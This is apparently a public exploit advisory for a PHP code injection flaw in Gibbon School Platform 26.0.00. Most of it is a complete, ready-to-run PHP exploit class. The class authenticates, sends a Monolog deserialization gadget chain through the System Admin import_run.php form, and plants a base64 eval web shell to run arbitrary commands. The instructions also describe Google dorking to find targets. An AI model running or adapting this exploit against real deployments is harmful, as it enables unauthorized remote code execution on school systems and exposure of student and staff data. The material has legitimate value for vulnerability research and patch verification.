Headline
Gibbon School Platform 26.0.00 Code Injection
Gibbon School Platform version 26.0.00 suffers from a PHP code injection vulnerability.
=============================================================================================================================================| # Title : Gibbon School Platform 26.0.00 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://gibbonedu.org/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 108 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GibbonExploit{ private $target_uri; private $username; private $password; private $webshell_name; public function __construct($target_uri, $username, $password, $webshell_name = null) { $this->target_uri = $target_uri; $this->username = $username; $this->password = $password; $this->webshell_name = $webshell_name ?: $this->randomString() . '.php'; } private function send_request($method, $url, $data = null, $headers = []) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); if ($data) { curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); if (!empty($headers)) { curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); } $response = curl_exec($ch); curl_close($ch); return $response; } public function gibbon_login() { $login_url = $this->target_uri . '/login.php?timeout=true'; $data = [ 'address' => '', 'method' => 'default', 'username' => $this->username, 'password' => $this->password, 'gibbonSchoolYearID' => '025', 'gibboni18nID' => '0002' ]; return $this->send_request('POST', $login_url, http_build_query($data)); } private function construct_form_data($payload) { $payload_len = strlen($payload); $payload_data = 'a:2:{i:7;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{s:9:"\x00*\x00socket";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";r:3;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;s:' . $payload_len . ':"' . $payload . '";s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}i:7;i:7;}'; $form_data = [ 'address' => '/modules/System Admin/import_run.php', 'mode' => 'sync', 'syncField' => 'N', 'syncColumn' => '', 'columnOrder' => $payload_data, 'columnText' => 'N;', 'fieldDelimiter' => '%2C', 'stringEnclosure' => '%22', 'filename' => $this->randomString() . '.xlsx', 'csvData' => '"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"', 'ignoreErrors' => '1', 'Failed' => 'Submit' ]; return $form_data; } public function upload_webshell($b64_payload) { $php_payload = "echo \"<?php @eval(base64_decode('$b64_payload'));?>\" > " . $this->webshell_name; $form_data = $this->construct_form_data($php_payload); $url = $this->target_uri . '/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'; return $this->send_request('POST', $url, http_build_query($form_data)); } public function execute_php($cmd) { $b64_payload = base64_encode($cmd); $res = $this->upload_webshell($b64_payload); if (!$res) { die('Web shell upload error.'); } // execute the webshell $url = $this->target_uri . '/' . $this->webshell_name; return $this->send_request('GET', $url); } private function randomString($length = 10) { return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length); }}// Usage$exploit = new GibbonExploit('https://target-site.com', '[email protected]', 'password');$exploit->gibbon_login();$response = $exploit->execute_php('phpinfo();');echo $response;Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================